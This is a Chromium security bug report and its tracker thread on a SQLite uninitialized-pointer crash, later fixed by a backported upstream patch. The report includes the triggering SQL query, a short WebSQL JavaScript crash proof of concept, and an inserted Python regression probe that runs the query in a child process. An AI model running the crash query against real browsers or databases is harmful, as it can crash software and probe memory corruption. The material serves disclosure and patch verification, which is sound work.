
Issue metadata

Status: Fixed
Owner:
ex-Googler
Closed: Mar 2015
Cc:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Security: sqlite bad ptr access

Project Member Reported by lcamtuf@google.com, Mar 20 2015

Issue description

Reported upstream, but also filing here for tracking purposes. Will update with an upstream patch.

Offending query:

SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";

...will cause sqlite to access an uninitialized ptr when handling expressions in order statements. Spewed out by AFL. Appears reproducible with WebSQL in Chrome. Crash PoC:

var db = window.openDatabase("DBName", "1.0", "description", 5*1024*1024);
db.transaction(function(tx) {
  tx.executeSql('SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";', [], alert, alert);
});
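
The following is an added regression probe, not code from the bug report, Chromium or SQLite. It checks that the SQLite linked into the local Python is at or past the 3.8.9 release that carries the upstream fix, and runs the query from the report inside a throwaway child interpreter so that a crash in an unpatched library is contained and reported rather than taking down the caller. The names version_has_fix, probe_query and CHILD_SCRIPT are this example's own.

```python
# Added regression probe; not code from the bug report, Chromium or SQLite.
import sqlite3
import subprocess
import sys

# The query from the report: a double-quoted COLLATE name that pre-fix
# SQLite dequoted more than once, leaving an uninitialized pointer behind.
OFFENDING_QUERY = 'SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";'

# First release carrying the upstream fix eddc05e7bb31fae7 (comment 2).
FIXED_VERSION = (3, 8, 9)

# Body of the child interpreter. Any sqlite3.Error (on a fixed library the
# expected one is "no such collation sequence") is a clean exit; only a
# crash or an unexpected exception leaves a nonzero return code.
CHILD_SCRIPT = r"""
import sqlite3, sys
con = sqlite3.connect(":memory:")
try:
    con.execute(sys.argv[1]).fetchall()
except sqlite3.Error:
    pass
"""


def version_has_fix(version_info=sqlite3.sqlite_version_info):
    """True if the linked SQLite release is at or past the fix release."""
    return tuple(version_info[:3]) >= FIXED_VERSION


def probe_query(query=OFFENDING_QUERY, timeout=30):
    """Run `query` in a child process so a library crash cannot take down
    the caller, and report how the child ended. A negative return code on
    POSIX means the child died from a signal (SIGSEGV for a bad pointer
    dereference); any nonzero code is treated as abnormal."""
    proc = subprocess.run(
        [sys.executable, "-c", CHILD_SCRIPT, query],
        capture_output=True, text=True, timeout=timeout,
    )
    return {"returncode": proc.returncode,
            "crashed": proc.returncode != 0,
            "stderr": proc.stderr.strip()}


if __name__ == "__main__":
    print("SQLite", sqlite3.sqlite_version, "has fix:", version_has_fix())
    result = probe_query()
    print("crash observed:", result["crashed"], result["stderr"])
```

On a fixed library the child sees only the expected "no such collation sequence" error and exits cleanly; a child killed by a signal is the signature of the bug described above.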


Comment 1 by kenrb@chromium.org, Mar 20 2015

Labels: Security_Impact-Stable Security_Severity-High
Status: ExternalDependency

Comment 2 by lcamtuf@google.com, Mar 21 2015

The fix is in:

https://www.sqlite.org/src/info/eddc05e7bb31fae7

I'll leave it to you to decide if you want to cherry-pick or wait for the next release (3.8.9). The release will also include a bunch of other fuzzer fixes, but most of them are non-exploitable.
Owner: sh...@chromium.org

Comment 4 by sh...@chromium.org, Mar 23 2015

Do you do Chromium code reviews? Wasn't clear from looking at logs.
https://codereview.chromium.org/1022423004/

Cherry-pick, because we don't have a set schedule for SQLite imports. Patch had a couple of rejects, but the merge seems fine.

Comment 5 by lcamtuf@google.com, Mar 25 2015

Nope, but pinged Abhishek off-bug. Thanks!
Cc: michaeln@chromium.org
Status: Fixed
Labels: M-42 Merge-Requested

Comment 10 by ClusterFuzz, Mar 27 2015

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: M-41
Cc: timwillis@chromium.org

Comment 13 by amin...@google.com, Mar 27 2015

Labels: -Merge-Requested Merge-Review Hotlist-Merge-Review
[Automated comment] Request affecting a post-stable build (M41), manual review required.

Comment 14 by amin...@google.com, Mar 27 2015

Labels: Merge-Approved Hotlist-Merge-Approved
Approved for M42 (branch: 2311)
Labels: -M-41 -Merge-Review -Hotlist-Merge-Review
This fix will go out with M42. -M-41.

Comment 16 by bugdroid1@chromium.org, Mar 27 2015

Labels: -Merge-Approved merge-merged-2311
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/90856262ae6ae80bd6f478b820515e35c21f094b

commit 90856262ae6ae80bd6f478b820515e35c21f094b
Author: Scott Hess <shess@chromium.org>
Date: Fri Mar 27 22:52:32 2015

[sqlite backport] Fix collation dequoting.

Backport https://www.sqlite.org/src/info/eddc05e7bb31fae7
"Fix a problem causing collation sequence names to be dequoted
multiple times under some circumstances."

BUG= 469082 
TBR=inferno@chromium.org

Review URL: https://codereview.chromium.org/1022423004

Cr-Commit-Position: refs/heads/master@{#322165}
(cherry picked from commit 3e13a01e946b7df16a5b3702ac016b5784945a90)

Review URL: https://codereview.chromium.org/1037403003

Cr-Commit-Position: refs/branch-heads/2311@{#369}
Cr-Branched-From: 09b7de5dd7254947cd4306de907274fa63373d48-refs/heads/master@{#317474}

[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/amalgamation/sqlite3.c
[add] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/patches/0018-backport-Fix-collation-dequoting.patch
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/expr.c
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/parse.y
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/sqliteInt.h
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/where.c
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/test/collate1.test

Labels: Release-0-M42
Cc: thakis@chromium.org
Issue 477340 has been merged into this issue.

Comment 20 by ClusterFuzz, Jul 1 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.

Comment 21 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 22 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
